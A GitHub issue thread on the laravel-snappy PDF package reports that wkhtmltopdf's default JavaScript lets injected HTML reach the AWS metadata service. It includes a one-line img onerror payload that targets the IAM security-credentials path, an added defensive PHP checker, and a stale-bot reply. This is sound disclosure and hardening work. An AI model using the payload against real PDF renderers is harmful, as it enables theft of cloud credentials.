barryvdh / laravel-snappy

Laravel Snappy PDF
MIT License

Javascript security #483

Open ricsands2801 opened 1 year ago

ricsands2801 commented 1 year ago

By using this package with disable-javascript not set, it is possible to call the AWS metadata APIs, e.g.

<img src=\"https://img.uk/1.jpg\" onerror='var ifrm = document.createElement(\"iframe\");ifrm.setAttribute(\"src\", \"http://169.254.169.254/latest/meta-data/iam/security-credentials/{{profile}}\");ifrm.style.width = \"100px\";ifrm.style.height = \"1000px\";document.body.appendChild(ifrm);'></img>

I think shipping with JavaScript disabled by default is best, with details on the risks.

thelfensdrfer commented 1 year ago

https://wkhtmltopdf.org/usage/wkhtmltopdf.txt

-n, --disable-javascript    Do not allow web pages to run javascript
    --enable-javascript     Do allow web pages to run javascript (default)

I think it should behave exactly like the original library does.
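An added example, not part of the thread and not laravel-snappy's own code: a pre-render check in PHP that flags script elements, inline event handlers and literal link-local URLs in HTML before it is handed to wkhtmltopdf, next to the option that turns JavaScript off. The function names, the constant and the sample input are constructed for illustration, and the `config/snappy.php` layout named in the comment is an assumption.

```php
<?php
// Added example; names below are hypothetical, not laravel-snappy APIs.

// Value for 'pdf' => ['options' => ...] in config/snappy.php (assumed layout).
// An empty options array leaves wkhtmltopdf on its default, --enable-javascript.
const HARDENED_OPTIONS = ['disable-javascript' => true];

// True when $url has a literal IPv4 host inside 169.254.0.0/16 (link-local).
// Hostnames are not resolved here, so this is a lint, not a network control.
function isLinkLocalUrl(string $url): bool
{
    $host = parse_url($url, PHP_URL_HOST);
    if (!is_string($host) || filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return false;
    }
    return strncmp($host, '169.254.', 8) === 0;
}

// Reasons why $html should not be rendered as-is; empty array when none found.
function findRenderRisks(string $html): array
{
    if (trim($html) === '') {
        return [];
    }
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // tolerate malformed HTML
    $doc->loadHTML($html, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $risks = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (strtolower($el->nodeName) === 'script') {
            $risks[] = 'script element';
        }
        foreach ($el->attributes as $attr) {
            $name = strtolower($attr->nodeName);
            if (strncmp($name, 'on', 2) === 0) {
                $risks[] = "inline handler {$name} on <{$el->nodeName}>";
            } elseif (in_array($name, ['src', 'href'], true) && isLinkLocalUrl((string) $attr->nodeValue)) {
                $risks[] = "link-local URL in {$name} on <{$el->nodeName}>";
            }
        }
    }
    return $risks;
}

// Constructed sample with the same shape as the report: an onerror handler on an image.
$sample = '<p>Invoice</p><img src="https://example.invalid/1.jpg" onerror="/* script body */">';
foreach (findRenderRisks($sample) as $risk) {
    echo $risk, PHP_EOL;
}
```

For a single render, the same option can be set with the wrapper's `setOption('disable-javascript', true)` call instead of the config file.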

stale[bot] commented 1 year ago

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.

Any issues with PDF rendering itself that are not directly related to this package, should be reported on https://github.com/KnpLabs/snappy instead. When having doubts, please try to reproduce the issue with just snappy.

If you believe this is an actual issue with the latest version of laravel-snappy, please reply to this issue so we can investigate further. Thank you for your contribution! Apologies for any delayed response on our side.